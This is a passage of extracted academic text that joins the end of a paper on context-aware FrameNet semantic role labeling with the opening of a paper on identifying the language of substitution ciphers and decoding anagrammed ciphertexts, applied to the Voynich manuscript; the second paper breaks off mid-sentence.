assignments re- quire some form of world knowledge which is not expressed within the respective sentences but might be approximated based on context. For example, knowing that aunt, uncle and grandmother are role fillers of a KINSHIP frame means that they are of the semantic type human and thus only compatible with the frame element RECIPIENT, not with GOAL. Similarly, correctly classifying the relation between Clinton and stooge in the last example is only possi- ble if the model has access to some information that makes Clinton a likely filler of the SUPERIOR role. We conjecture that document-specific word vector representations provide such information given that Clinton co-occurs in the document with words such as president, chief, and claim. Overall, we find that the features introduced in Section 5 model a fair amount of contextual in- formation which can help a semantic role labeling model to perform better decisions. 7 Discussion In this section, we discuss the extent to which our model leverages the full potential of contextual fea- tures for semantic role labeling. We manually ex- amine role assignments to frame elements which seem particularly sensitive to context. We analyze such frame elements based on differences in label assignment between Framat and Framat+context that can be traced back to factors such as agency in dis- 456 SEMAFOR *Can [he]THEME goMOTION [to Paris]GOAL on Dec. 1 ? Framat *Can [he]THEME goMOTION [to Paris on Dec. 1]GOAL ? Framat+context Can [he]THEME goMOTION [to Paris]GOAL [on Dec. 1]TIME ? SEMAFOR *SendSENDING [my regards]THEME to my aunt , uncle and grandmother . Framat *SendSENDING [my regards]THEME [to my aunt , uncle and grandmother]GOAL . Framat+context SendSENDING [my regards]THEME [to my aunt , uncle and grandmother]RECIPIENT . SEMAFOR *Stephanopoulos does n’t want to seem a Clinton stoogeSUBORDINATES AND SUPERIORS Framat *Stephanopoulos doesn’t want to seem a [Clinton]DESCRIPTOR stoogeSUBORDINATES AND SUPERIORS Framat+context Stephanopoulos does n’t want to seem a [Clinton]SUPERIOR stoogeSUBORDINATES AND SUPERIORS Table 7: Examples of frame structures that are labeled incorrectly (marked by asterisks) without contextual features. course and word sense in context. We investigate whether our model captures these factors success- fully and showcase examples while reporting abso- lute changes in precision and recall. 7.1 Agency and Discourse Many frame elements in FrameNet indicate agency, a property that we expect to highly correlate with contextual features on semantic types of assigned roles (see Section 5.2) and discourse salience (see Section 5.3). Analysis of system output revealed that such features indeed affect and generally im- prove role labeling. Considering all AGENT ele- ments across frames, we observe absolute improve- ments of 4% in precision and 3% in recall. In the fol- lowing, we provide a more detailed analysis of two specific frame elements: the low frequent AGENT element of the PROJECT frame and the highly fre- quent SPEAKER element in the STATEMENT frame. The AGENT of a PROJECT is defined as the “individual or organization that carries out the PROJECT”. The main difficulty in identifying in- stances of this frame element is that the frame- evoking target word is typically a noun such as project, plan, or program and hence syntactic fea- tures on word-word dependencies do not provide sufficient cues. We found several cases where con- text provided missing cues, leading to an increase in recall from 56% to 78%. In cases where addi- tional features did not help, we identified two types of errors: firstly, the filler was too far from the tar- get word and therefore could not be identified as a filler at all (“[North Korea]AGENT is developing ... programPROJECT ”), and secondly, earlier men- tions indicating agency were not detected by the coreference resolution system (“The IAEA assisted Syria (...) This study was part of an IAEAAGENT .. programPROJECT ). The SPEAKER of a STATEMENT is defined as “the sentient entity that produces [a] MESSAGE”. Instances of the STATEMENT frame are frequently evoked by verbs such as say, mention, and claim. The SPEAKER role can be hard to identify in sub- ject position as an unknown entity could also fill the MEDIUM role. For example, “a report claims that ...” should be analyzed differently from “a person claims”. Our contextual features improve role label- ing in cases where the subject can be classified based on previous role assignments. On the negative side, we found our model to be too conservative in some cases where a subject is discourse new. Additional gains would be possible with improved coreference chains that include pronouns such as some and I. Such chains could be established through a better preprocessing pipeline or by utilizing additional lin- guistic resources. 7.2 Word Meaning and Context As discussed earlier, we expect that the meaning of a word in context provides valuable cues regarding potential frame elements. Two types of words are of particular interest here: ambiguous words, for which different senses might apply depending on context, and out-of-vocabulary words, for which no clear sense could be established during training. In the following, we take a closer look at differences in role assignment between Framat and Framat+context for such fillers. Ambiguous words that occur as fillers of differ- ent frame elements in the test set include party, 457 power, program, and view. We find occurrences of these words in two broad types of contexts: po- litical and non-political. Within political contexts, party and power fill frame elements such as POS- SESSION and LEADER. Outwith political contexts, we find frame elements such as ELECTRICITY and SOCIAL EVENT to be far more likely. The Framat model exhibits a general bias towards the political domain, often missing instances of frame elements that are more common in non-political contexts (e.g., “the six-[party]INTERLOCUTORS talksDISCUSSION ”). Framat+context, in contrast, shows less of a bias and provides better classification based on context fea- tures for all frame elements. Overall, precision for the four ambiguous words is improved from 86% to 93%, with a few errors remaining due to rare depen- dency paths (e.g., [program]ACT NMOD←−−− which SBAR←−− is PRD←−−violationCOMPLIANCE ) and differences between frame elements that depend on factors such as num- ber (COGNIZER vs. COGNIZER 1). A frequently observed error by the baseline model is to assign peripheral frame elements such as TIME to role fillers that actually are not time expressions. This happens because words which have not been seen frequently during training but appear in adverbial positions are generally likely to fill the frame element TIME. We find that the use of document-specific word vector representations drastically reduces the number of such errors (e.g., “to giveGIVING [generously]MANNER vs. *TIME ”), with absolute gains in precision and recall of 14% and 9%, respectively, presumably because non-time expressions are often distributed differently across a document than time expressions. Document- specific word vector representations also improve recall for out-of-vocabulary words, as seen with the example of Dec discussed in Section 6. However, such representations by themselves might be insuf- ficient to determine which aspects of a word sense are applicable across a document as occurrences in specific contexts may also be misleading (e.g., “. . . changes [throughout the community]” vs. “... [throughout the ages]TIME ”). Some of these cases could be resolved using higher level features that explicitly model interactions between (predicted) word meaning in context and other factors, however we leave this to future work. 8 Conclusions In this paper, we enriched a traditional semantic role labeling model with additional information from context. The corresponding features we defined can be grouped into three categories: (1) discourse-level features that directly utilize discourse knowledge in the form of coreference chains (newness, prior role assignments), (2) sentence-level features that model properties of a frame structure as a whole, and (3) lexical features that can be computed using methods from distributional semantics and an adaptation to model document-specific word meaning. To implement our discourse-level enhancements, we modified a semantic role labeling system de- veloped for PropBank/NomBank which we found to achieve competitive performance on FrameNet- based annotations. Our main contribution lies in extending this system to the discourse level. Our experiments revealed that discourse aware features can significantly improve semantic role labeling per- formance, leading to gains of over +2.0 percent- age points in precision and state-of-the-art results in terms of F1. Analysis of system output revealed two reasons for improvement. Firstly, contextual features provide necessary additional information to understand and assign roles on the sentence level, and secondly, some of our discourse-level features generalize better than traditional lexical and syntac- tic features. We further found that additional gains can be achieved using improved preprocessing tools and a more sophisticated model for feature inter- actions. In the future, we are planning to assess whether discourse-level features generalize cross- linguistically. We would also like to investigate whether semantic role labeling can benefit from rec- ognizing textual entailment and high-level discourse relations. Our code is publicly available under http://github.com/microth/mateplus. Acknowledgements We are grateful to Diana McCarthy and three anony- mous referees whose feedback helped to substan- tially improve the present paper. The research pre- sented in this paper was funded by a DFG Research Fellowship (RO 4848/1-1). 458 http://github.com/microth/mateplus References Apoorv Agarwal, Sriramkumar Balasubramanian, Anup Kotalwar, Jiehan Zheng, and Owen Rambow. 2014. Frame semantic tree kernels for social network extrac- tion from text. In Proceedings of the 14th Confer- ence of the European Chapter of the Association for Computational Linguistics, pages 211–219, Gothen- burg, Sweden, 26–30 April 2014. Anders Björkelund, Bernd Bohnet, Love Hafdell, and Pierre Nugues. 2010. A high-performance syntac- tic and semantic dependency parser. In Coling 2010: Demonstration Volume, pages 33–36, Beijing, China. Wanxiang Che, Ting Liu, and Yongqiang Li. 2010. Im- proving semantic role labeling with word sense. In Human Language Technologies: The 2010 Annual Conference of the North American Chapter of the As- sociation for Computational Linguistics, pages 246– 249, Los Angeles, California, 1–6 June 2010. Bob Coyne, Alex Klapheke, Masoud Rouhizadeh, Richard Sproat, and Daniel Bauer. 2012. Annotation tools and knowledge representation for a text-to-scene system. In Proceedings of 24th International Con- ference on Computational Linguistics, pages 679–694, Mumbai, India, 8–15 December 2012. Danilo Croce, Cristina Giannone, Paolo Annesi, and Roberto Basili. 2010. Towards open-domain semantic role labeling. In Proceedings of the 48th Annual Meet- ing of the Association for Computational Linguistics, pages 237–246, Uppsala, Sweden, 11–16 July 2010. Danilo Croce, Alessandro Moschitti, and Roberto Basili. 2011. Structured lexical similarity via convolution kernels on dependency trees. In Proceedings of the 2011 Conference on Empirical Methods in Natural Language Processing, pages 1034–1046, Edinburgh, United Kingdom. Dipanjan Das and Noah A. Smith. 2011. Semi- supervised frame-semantic parsing for unknown pred- icates. In Proceedings of the 49th Annual Meeting of the Association for Computational Linguistics: Hu- man Language Technologies, Portland, Oregon, 19–24 June 2011. Dipanjan Das, Desai Chen, André F. T. Martins, Nathan Schneider, and Noah A. Smith. 2014. Frame-Semantic Parsing. Computational Linguistics, 40(1):9–56. Koen Deschacht and Marie-Francine Moens. 2009. Semi-supervised semantic role labeling using the La- tent Words Language Model. In Proceedings of the 2009 Conference on Empirical Methods in Natural Language Processing, pages 21–29, Singapore, 2–7 August 2009. Georgiana Dinu and Mirella Lapata. 2010. Measuring distributional similarity in context. In Proceedings of the 2010 Conference on Empirical Methods in Natural Language Processing, pages 1162–1172, Cambridge, Massachusetts, 9–11 October 2010. Charles J. Fillmore. 1976. Frame semantics and the na- ture of language. In Annals of the New York Academy of Sciences: Conference on the Origin and Develop- ment of Language and Speech, volume 280, pages 20– 32. William Foland and James Martin. 2015. Dependency- based semantic role labeling using convolutional neu- ral networks. In Proceedings of the Fourth Joint Conference on Lexical and Computational Semantics, pages 279–288, Denver, Colorado. Matthew Gerber and Joyce Chai. 2012. Semantic Role Labeling of Implicit Arguments for Nominal Predi- cates. Computational Linguistics, 38(4):755–798. Daniel Gildea and Daniel Jurafsky. 2002. Automatic la- beling of semantic roles. Computational Linguistics, 28(3):245–288. Philip Gorinski, Josef Ruppenhofer, and Caroline Sporleder. 2013. Towards weakly supervised resolu- tion of null instantiations. In Proceedings of the 10th International Conference on Computational Semantics (IWCS 2013) – Long Papers, pages 119–130, Potsdam, Germany, 19–22 March 2013. Karl Moritz Hermann, Dipanjan Das, Jason Weston, and Kuzman Ganchev. 2014. Semantic frame identifica- tion with distributed word representations. In Pro- ceedings of the 52nd Annual Meeting of the Associa- tion for Computational Linguistics, pages 1448–1458, Baltimore, Maryland, 23–25 June 2014. Fei Huang and Alexander Yates. 2010. Open-domain semantic role labeling by modeling word spans. In Proceedings of the 48th Annual Meeting of the Associ- ation for Computational Linguistics, pages 968–978, Uppsala, Sweden, 11–16 July 2010. Richard Johansson and Pierre Nugues. 2008. The ef- fect of syntactic representation on semantic role label- ing. In Proceedings of the 22nd International Con- ference on Computational Linguistics, pages 393–400, Manchester, United Kingdom, 18–22 August 2008. Egoitz Laparra and German Rigau. 2013. Sources of ev- idence for implicit argument resolution. In Proceed- ings of the 10th International Conference on Compu- tational Semantics (IWCS 2013) – Long Papers, pages 155–166, Potsdam, Germany, 19–22 March 2013. Heeyoung Lee, Angel Chang, Yves Peirsman, Nathanael Chambers, Mihai Surdeanu, and Dan Jurafsky. 2013. Deterministic coreference resolution based on entity- centric, precision-ranked rules. Computational Lin- guistics, 39(4):885–916. Tao Lei, Yuan Zhang, Lluı́s Màrquez, Alessandro Mos- chitti, and Regina Barzilay. 2015. High-order low- rank tensors for semantic role labeling. In Proceedings 459 of the 2015 Conference of the North American Chapter of the Association for Computational Linguistics: Hu- man Language Technologies, pages 1150–1160, Den- ver, Colorado. Tomas Mikolov, Wen-tau Yih, and Geoffrey Zweig. 2013. Linguistic regularities in continuous space word representations. In Proceedings of the 2013 Confer- ence of the North American Chapter of the Associa- tion for Computational Linguistics: Human Language Technologies, pages 746–751, Atlanta, Georgia, 9–15 June 2013. Alessandro Moschitti. 2004. A study on convolution kernels for shallow statistic parsing. In Proceedings of the 42nd Meeting of the Association for Computa- tional Linguistics (ACL’04), Main Volume, pages 335– 342, Barcelona, Spain. Sebastian Padó, Marco Pennacchiotti, and Caroline Sporleder. 2008. Semantic role assignment for event nominalisations by leveraging verbal data. In Pro- ceedings of the 22nd International Conference on Computational Linguistics (Coling 2008), pages 665– 672, Manchester, United Kingdom. Marco Pennacchiotti, Diego De Cao, Roberto Basili, Danilo Croce, and Michael Roth. 2008. Automatic induction of FrameNet lexical units. In Proceedings of the 2008 Conference on Empirical Methods in Nat- ural Language Processing, pages 457–465, Honolulu, Hawaii, USA, 25–27 October 2008. Jeffrey Pennington, Richard Socher, and Christopher Manning. 2014. Glove: Global vectors for word rep- resentation. In Proceedings of the 2014 Conference on Empirical Methods in Natural Language Processing, pages 1532–1543, Doha, Qatar, 25–29 October 2014. Ralph L Rose. 2011. Joint information value of syntactic and semantic prominence for subsequent pronominal reference. Salience: Multidisciplinary Perspectives on Its Function in Discourse, 227:81–103. Michael Roth and Kristian Woodsend. 2014. Compo- sition of word representations improves semantic role labelling. In Proceedings of the 2014 Conference on Empirical Methods in Natural Language Processing, pages 407–413, Doha, Qatar, 25–29 October 2014. Josef Ruppenhofer, Michael Ellsworth, Miriam R. L. Petruck, Christopher R. Johnson, and Jan Scheffczyk. 2010. FrameNet II: Extended Theory and Practice. Technical report, International Computer Science In- stitute, 14 September 2010. Josef Ruppenhofer, Philip Gorinski, and Caroline Sporleder. 2011. In search of missing arguments: A linguistic approach. In Proceedings of the Inter- national Conference Recent Advances in Natural Lan- guage Processing 2011, pages 331–338, Hissar, Bul- garia, 12–14 September 2011. Magnus Sahlgren. 2008. The distributional hypothesis. Italian Journal of Linguistics, 20(1):33–54. Dan Shen and Mirella Lapata. 2007. Using semantic roles to improve question answering. In Proceedings of the 2007 Joint Conference on Empirical Methods in Natural Language Processing and Computational Natural Language Learning (EMNLP-CoNLL), pages 12–21, Prague, Czech Republic. Carina Silberer and Anette Frank. 2012. Casting implicit role linking as an anaphora resolution task. In Pro- ceedings of the First Joint Conference on Lexical and Computational Semantics (*SEM 2012), pages 1–10, Montréal, Canada, 7-8 June. Oscar Täckström, Kuzman Ganchev, and Dipanjan Das. 2015. Efficient inference and structured learning for semantic role labeling. Transactions of the Associa- tion for Computational Linguistics, 3:29–41. Stefan Thater, Hagen Fürstenau, and Manfred Pinkal. 2010. Contextualizing semantic representations us- ing syntactically enriched vector models. In Proceed- ings of the 48th Annual Meeting of the Association for Computational Linguistics, pages 948–957, Uppsala, Sweden, 11–16 July 2010. Kristina Toutanova, Aria Haghighi, and Christopher Manning. 2005. Joint learning improves semantic role labeling. In Proceedings of the 43rd Annual Meet- ing of the Association for Computational Linguistics, pages 589–596, Ann Arbor, Michigan, 29–30 June 2005. Boyi Xie, Rebecca J. Passonneau, Leon Wu, and Germán G. Creamer. 2013. Semantic frames to pre- dict stock price movement. In Proceedings of the 51st Annual Meeting of the Association for Computational Linguistics, pages 873–883, Sofia, Bulgaria, 4–9 Au- gust 2013. Nianwen Xue and Martha Palmer. 2004. Calibrating features for semantic role labeling. In Proceedings of the 2004 Conference on Empirical Methods in Natural Language Processing, pages 88–94, Barcelona, Spain, July. Alexander Yeh. 2000. More accurate tests for the sta- tistical significance of result differences. In Proceed- ings of the 18th International Conference on Computa- tional Linguistics, pages 947–953, Saarbrücken, Ger- many. Beñat Zapirain, Eneko Agirre, Lluı́s Màrquez, and Mi- hai Surdeanu. 2013. Selectional preferences for se- mantic role classification. Computational Linguistics, 39(3):631–663. 460 work_ia5azdhzengttdfylnfe4qbu6a ---- Decoding Anagrammed Texts Written in an Unknown Language and Script Bradley Hauer and Grzegorz Kondrak Department of Computing Science University of Alberta Edmonton, Canada {bmhauer,gkondrak}@ualberta.ca Abstract Algorithmic decipherment is a prime exam- ple of a truly unsupervised problem. The first step in the decipherment process is the iden- tification of the encrypted language. We pro- pose three methods for determining the source language of a document enciphered with a monoalphabetic substitution cipher. The best method achieves 97% accuracy on 380 lan- guages. We then present an approach to de- coding anagrammed substitution ciphers, in which the letters within words have been ar- bitrarily transposed. It obtains the average de- cryption word accuracy of 93% on a set of 50 ciphertexts in 5 languages. Finally, we report the results on the Voynich manuscript, an un- solved fifteenth century cipher, which suggest Hebrew as the language of the document. 1 Introduction The Voynich manuscript is a medieval codex1 con- sisting of 240 pages written in a unique script, which has been referred to as the world’s most important unsolved cipher (Schmeh, 2013). The type of ci- pher that was used to generate the text is unknown; a number of theories have been proposed, includ- ing substitution and transposition ciphers, an abjad (a writing system in which vowels are not written), steganography, semi-random schemes, and an elab- orate hoax. However, the biggest obstacle to deci- 1The manuscript was radiocarbon dated to 1404-1438 AD in the Arizona Accelerator Mass Spectrometry Labo- ratory (http://www.arizona.edu/crack-voynich-code, accessed Nov. 20, 2015). phering the manuscript is the lack of knowledge of what language it represents. Identification of the underlying language has been crucial for the decipherment of ancient scripts, in- cluding Egyptian hieroglyphics (Coptic), Linear B (Greek), and Mayan glyphs (Ch’olti’). On the other hand, the languages of many undeciphered scripts, such as Linear A, the Indus script, and the Phaistos Disc, remain unknown (Robinson, 2002). Even the order of characters within text may be in doubt; in Egyptian hieroglyphic inscriptions, for instance, the symbols were sometimes rearranged within a word in order to create a more elegant inscription (Singh, 2011). Another complicating factor is the omission of vowels in some writing systems. Applications of ciphertext language identification extend beyond secret ciphers and ancient scripts. Nagy et al. (1987) frame optical character recogni- tion as a decipherment task. Knight et al. (2006) note that for some languages, such as Hindi, there exist many different and incompatible encoding schemes for digital storage of text; the task of an- alyzing such an arbitrary encoding scheme can be viewed as a decipherment of a substitution cipher in an unknown language. Similarly, the unsupervised derivation of transliteration mappings between dif- ferent writing scripts lends itself to a cipher formu- lation (Ravi and Knight, 2009). The Voynich manuscript is written in an unknown script that encodes an unknown language, which is the most challenging type of a decipherment prob- lem (Robinson, 2002, p. 46). Inspired by the mys- tery of both the Voynich manuscript and the un- deciphered ancient scripts, we develop a series of 75 Transactions of the Association for Computational Linguistics, vol. 4, pp. 75–86, 2016. Action Editor: Regina Barzilay. Submission batch: 12/2015; Published 4/2016. c©2016 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. algorithms for the purpose of decrypting unknown alphabetic scripts representing unknown languages. We assume that symbols in scripts which contain no more than a few dozen unique characters roughly correspond to phonemes of a language, and model them as monoalphabetic substitution ciphers. We further allow that an unknown transposition scheme could have been applied to the enciphered text, resulting in arbitrary scrambling of letters within words (anagramming). Finally, we consider the pos- sibility that the underlying script is an abjad, in which only consonants are explicitly represented. Our decryption system is composed of three steps. The first task is to identify the language of a cipher- text, by comparing it to samples representing known languages. The second task is to map each symbol of the ciphertext to the corresponding letter in the identified language. The third task is to decode the resulting anagrams into readable text, which may in- volve the recovery of unwritten vowels. The paper is structured as follows. We discuss re- lated work in Section 2. In Section 3, we propose three methods for the source language identification of texts enciphered with a monoalphabetic substitu- tion cipher. In Section 4, we present and evaluate our approach to the decryption of texts composed of en- ciphered anagrams. In Section 5, we apply our new techniques to the Voynich manuscript. Section 6 concludes the paper. 2 Related Work In this section, we review particularly relevant prior work on the Voynich manuscript, and on algorithmic decipherment in general. 2.1 Voynich Manuscript Since the discovery of the Voynich manuscript (henceforth referred to as the VMS), there have been a number of decipherments claims. Newbold and Kent (1928) proposed an interpretation based on mi- croscopic details in the text, which was subsequently refuted by Manly (1931). Other claimed decipher- ments by Feely (1943) and Strong (1945) have also been refuted (Tiltman, 1968). A detailed study of the manuscript by d’Imperio (1978) details various other proposed solutions and the arguments against them. Figure 1: A sample from the Voynich manuscript. Numerous languages have been proposed to un- derlie the VMS. The properties and the dating of the manuscript imply Latin and Italian as potential can- didates. On the basis of the analysis of the character frequency distribution, Jaskiewicz (2011) identifies five most probable languages, which include Mol- davian and Thai. Reddy and Knight (2011) discover an excellent match between the VMS and Quranic Arabic in the distribution of word lengths, as well as a similarity to Chinese Pinyin in the predictability of letters given the preceding letter. It has been suggested previously that some ana- gramming scheme may alter the sequence order of characters within words in the VMS. Tiltman (1968) observes that each symbol behaves as if it had its own place in an “order of precedence” within words. Rugg (2004) notes the apparent similarity of the VMS to a text in which each word has been replaced by an alphabetically ordered anagram (alphagram). Reddy and Knight (2011) show that the letter se- quences are generally more predictable than in nat- ural languages. Some researchers have argued that the VMS may be an elaborate hoax created to only appear as a meaningful text. Rugg (2004) suggests a tabular method, similar to the sixteenth century technique of the Cardan grille, although recent dating of the manuscript to the fifteenth century provides evi- dence to the contrary. Schinner (2007) uses analy- sis of random walk techniques and textual statistics to support the hoax hypothesis. On the other hand, Landini (2001) identifies in the VMS language-like statistical properties, such as Zipf’s law, which were only discovered in the last century. Similarly, Mon- temurro and Zanette (2013) use information theo- retic techniques to find long-range relationships be- tween words and sections of the manuscript, as well as between the text and the figures in the VMS. 76 2.2 Algorithmic Decipherment A monoalphabetic substitution cipher is a well- known method of enciphering a plaintext by con- verting it into a ciphertext of the same length using a 1-to-1 mapping of symbols. Knight et al. (2006) propose a method for deciphering substitution ci- phers which is based on Viterbi decoding with map- ping probabilities computed with the expectation- maximization (EM) algorithm. The method cor- rectly deciphers 90% of symbols in a 400-letter ci- phertext when a trigram character language model is used. They apply their method to ciphertext language identification using 80 different language samples, and report successful outcomes on three ci- phers that represent English, Spanish, and a Spanish abjad, respectively. Ravi and Knight (2008) present a more complex but slower method for solving substitution ciphers, which incorporates constraints that model the 1-to-1 property of the key. The objective function is again the probability of the decipherment relative to an n- gram character language model. A solution is found by optimally solving an integer linear program. Knight et al. (2011) describe a successful deci- pherment of an eighteenth century text known as the Copiale Cipher. Language identification was the first step of the process. The EM-based method of Knight et al. (2006) identified German as the most likely candidate among over 40 candidate charac- ter language models. The more accurate method of Ravi and Knight (2008) was presumably either too slow or too brittle for this purpose. The cipher was eventually broken using a combination of man- ual and algorithmic techniques. Hauer et al. (2014) present an approach to solv- ing monoalphabetic substitution ciphers which is more accurate than other algorithms proposed for this task, including Knight et al. (2006), Ravi and Knight (2008), and Norvig (2009). We provide a detailed description of the method in Section 4.1. 3 Source Language Identification In this section, we propose and evaluate three meth- ods for determining the source language of a docu- ment enciphered with a monoalphabetic substitution cipher. We frame it as a classification task, with the classes corresponding to the candidate languages, which are represented by short sample texts. The methods are based on: 1. relative character frequencies, 2. patterns of repeated symbols within words, 3. the outcome of a trial decipherment. 3.1 Character Frequency An intuitive way of guessing the source language of a ciphertext is by character frequency analysis. The key observation is that the relative frequencies of symbols in the text are unchanged after encipher- ment with a 1-to-1 substitution cipher. The idea is to order the ciphertext symbols by frequency, normal- ize these frequencies to create a probability distri- bution, and choose the closest matching distribution from the set of candidate languages. More formally, let PT be a discrete probability distribution where PT (i) is the probability of a ran- domly selected symbol in a text T being the ith most frequent symbol. We define the distance between two texts U and V to be the Bhattacharyya (1943) distance between the probability distributions PU and PV : d(U, V ) = − ln ∑ i √ PU(i) ·PV (i) The advantages of this distance metric include its symmetry, and the ability to account for events that have a zero probability (in this case, due to different alphabet sizes). The language of the closest sample text to the ciphertext is considered to be the most likely source language. This method is not only fast but also robust against letter reordering and the lack of word boundaries. 3.2 Decomposition Pattern Frequency Our second method expands on the character fre- quency method by incorporating the notion of de- composition patterns. This method uses multiple oc- currences of individual symbols within a word as a clue to the language of the ciphertext. For example, the word seems contains two instances of ‘s’ and ‘e’, and one instance of ‘m’. We are interested in captur- ing the relative frequency of such patterns in texts, independent of the symbols used. 77 Formally, we define a function f that maps a word to an ordered n-tuple (t1, t2, . . . tn), where ti ≥ tj if i < j. Each ti is the number of oc- currences of the ith most frequent character in the word. For example, f(seems) = (2, 2, 1), while f(beams) = (1, 1, 1, 1, 1). We refer to the resulting tuple as the decomposition pattern of the word. The decomposition pattern is unaffected by monoalpha- betic letter substitution or anagramming. As with the character frequency method, we define the distance between two texts as the Bhattacharyya distance be- tween their decomposition pattern distributions, and classify the language of a ciphertext as the language of the nearest sample text. It is worth noting that this method requires word separators to be preserved in the ciphertext. In fact, the effectiveness of the method comes partly from capturing the distribution of word lengths in a text. On the other hand, the decomposition patterns are independent of the ordering of characters within words. We will take advantage of this property in Section 4. 3.3 Trial Decipherment The final method that we present involves decipher- ing the document in question into each candidate language. The decipherment is performed with a fast greedy-swap algorithm, which is related to the algorithms of Ravi and Knight (2008) and Norvig (2009). It attempts to find the key that maximizes the probability of the decipherment according to a bi- gram character language model derived from a sam- ple document in a given language. The decipher- ment with the highest probability indicates the most likely plaintext language of the document. The greedy-swap algorithm is shown in Figure 2. The initial key is created by pairing the ciphertext and plaintext symbols in the order of decreasing fre- quency, with null symbols appended to the shorter of the two alphabets. The algorithm repeatedly at- tempts to improve the current key k by considering the “best” swaps of ciphertext symbol pairs within the key (if the key is viewed as a permutation of the alphabet, such a swap is a transposition). The best swaps are defined as those that involve a sym- bol occurring among the 10 least common bigrams in the decipherment induced by the current key. If any such swap yields a more probable decipherment, 1: kmax ← InitialKey 2: for m iterations do 3: k ← kmax 4: S ← best swaps for k 5: for each {c1, c2}∈S do 6: k′ ← k(c1↔c2) 7: if p(k′) > p(kmax) then kmax ← k′ 8: if kmax = k then return kmax 9: return kmax Figure 2: Greedy-swap decipherment algorithm. it is incorporated in the current key; otherwise, the algorithm terminates. The total number of iterations is bounded by m, which is set to 5 times the size of the alphabet. After the initial run, the algorithm is restarted 20 times with a randomly generated ini- tial key, which often results in a better decipherment. All parameters were established on a development set. 3.4 Evaluation We now directly evaluate the three methods de- scribed above by applying them to a set of cipher- texts from different languages. We adapted the dataset created by Emerson et al. (2014) from the text of the Universal Declaration of Human Rights (UDHR) in 380 languages.2 The average length of the texts is 1710 words and 11073 characters. We divided the text in each language into 66% train- ing, 17% development, and 17% test. The training part was used to derive character bigram models for each language. The development and test parts were separately enciphered with a random substitution ci- pher. Table 1 shows the results of the language identifi- cation methods on both the development and the test set. We report the average top-1 accuracy on the task of identifying the source language of 380 enciphered test samples. The differences between methods are statistically significant according to McNemar’s test with p < 0.0001. The random baseline of 0.3% in- dicates the difficulty of the task. The “oracle” de- cipherment assumes a perfect decipherment of the text, which effectively reduces the task to standard 2Eight languages from the original set were excluded be- cause of formatting issues. 78 Method Dev Test Random Selection 0.3 0.3 Jaskiewicz (2011) 54.2 47.6 Character Frequency 72.4 67.9 Decomposition Pattern 90.5 85.5 Trial Decipherment 94.2 97.1 Oracle Decipherment 98.2 98.4 Table 1: Language identification accuracy (in % correct) on ciphers representing 380 languages. language identification. All three of our methods perform well, with the accuracy gains reflecting their increasing complex- ity. Between the two character frequency methods, our approach based on Bhattacharyya distance is significantly more accurate than the method of Jask- iewicz (2011), which uses a specially-designed dis- tribution distance function. The decomposition pat- tern method makes many fewer errors, with the cor- rect language ranked second in roughly half of those cases. Trial decipherment yields the best results, which are close to the upper bound for the character bigram probability approach to language identifica- tion. The average decipherment error rate into the correct language is only 2.5%. In 4 out of 11 identi- fication errors made on the test set, the error rate is above the average; the other 7 errors involve closely related languages, such as Serbian and Bosnian. The trial decipherment approach is much slower than the frequency distribution methods, requiring roughly one hour of CPU time in order to classify each ciphertext. More complex decipherment algo- rithms are even slower, which precludes their appli- cation to this test set. Our re-implementations of the dynamic programming algorithm of Knight et al. (2006), and the integer programming solver of Ravi and Knight (2008) average 53 and 7000 seconds of CPU time, respectively, to solve a single 256 charac- ter cipher, compared to 2.6 seconds with our greedy- swap method. The dynamic programming algorithm improves decipherment accuracy over our method by only 4% on a benchmark set of 50 ciphers of 256 characters. We conclude that our greedy-swap al- gorithm strikes the right balance between accuracy and speed required for the task of cipher language identification. 4 Anagram Decryption In this section, we address the challenging task of deciphering a text in an unknown language written using an unknown script, and in which the letters within words have been randomly scrambled. The task is designed to emulate the decipherment prob- lem posed by the VMS, with the assumption that its unusual ordering of characters within words re- flects some kind of a transposition cipher. We re- strict the source language to be one of the candi- date languages for which we have sample texts; we model an unknown script with a substitution cipher; and we impose no constraints on the letter transposi- tion method. The encipherment process is illustrated in Figure 3. The goal in this instance is to recover the plaintext in (a) given the ciphertext in (c) without the knowledge of the plaintext language. We also con- sider an additional encipherment step that removes all vowels from the plaintext. Our solution is composed of a sequence of three modules that address the following tasks: language identification, script decipherment, and anagram de- coding. For the first task we use the decomposition pattern frequency method described in Section 3.2, which is applicable to anagrammed ciphers. After identifying the plaintext language, we proceed to re- verse the substitution cipher using a heuristic search algorithm guided by a combination of word and character language models. Finally, we unscramble the anagrammed words into readable text by fram- ing the decoding as a tagging task, which is effi- ciently solved with a Viterbi decoder. Our modular approach makes it easy to perform different levels of analysis on unsolved ciphers. 4.1 Script Decipherment For the decipherment step, we adapt the state-of-the- art solver of Hauer et al. (2014). In this section, we describe the three main components of the solver: key scoring, key mutation, and tree search. This is followed by the summary of modifications that make the method work on anagrams. The scoring component evaluates the fitness of each key by computing the smoothed probability of the resulting decipherment with both character- level and word-level language models. The word- level models promote decipherments that contain 79 (a) organized compositions through improvisational music into genres (b) fyovicstu dfnrfecpcfie pbyfzob cnryfgcevpcfivm nzecd cipf otiyte (c) otvfusyci cpifenfercfd bopbfzy fgyiemcpfcvrcnv nczed fpic etotyi (d) adegiknor ciimnooopsst ghhortu aaiiilmnooprstv cimsu inot eegnrs (e) adegiknor compositions through aaiiilmnooprstv music into greens Figure 3: An example of the encryption and decryption process: (a) plaintext; (b) after applying a substitution cipher; (c) ciphertext after random anagramming; (d) after substitution decipherment (in the alphagram representation); (e) final decipherment after anagram decoding (errors are underlined). in-vocabulary words and high-probability word n- grams, while the character level models allow for the incorporation of out-of-vocabulary words. The key mutation component crucially depends on the notion of pattern equivalence between char- acter strings. Two strings are pattern-equivalent if they share the same pattern of repeated letters. For example, MZXCX is pattern-equivalent with there and bases. but not with otter. For each word uni- gram, bigram, and trigram in the ciphertext, a list of the most frequent pattern equivalent n-grams from the training corpus is compiled. The solver repeat- edly attempts to improve the current key through a series of transpositions, so that a given cipher n- gram maps to a pattern-equivalent n-gram from the provided language sample. The number of substi- tutions for a given n-gram is limited to the k most promising candidates, where k is a parameter opti- mized on a development set. The key mutation procedure generates a tree structure, which is searched for the best-scoring de- cipherment using a version of beam search. The root of the tree contains the initial key, which is gener- ated according to simple frequency analysis (i.e., by mapping the n-th most common ciphertext character to the n-th most common character in the corpus). New tree leaves are spawned by modifying the keys of current leaves, while ensuring that each node in the tree has a unique key. At the end of computa- tion, the key with the highest score is returned as the solution. In our anagram adaptation, we relax the definition of pattern equivalence to include strings that have the same decomposition pattern, as defined in Sec- tion 3.2. Under the new definition, the order of the letters within a word has no effect on pattern equiv- alence. For example, MZXCX is equivalent not only with there and bases, 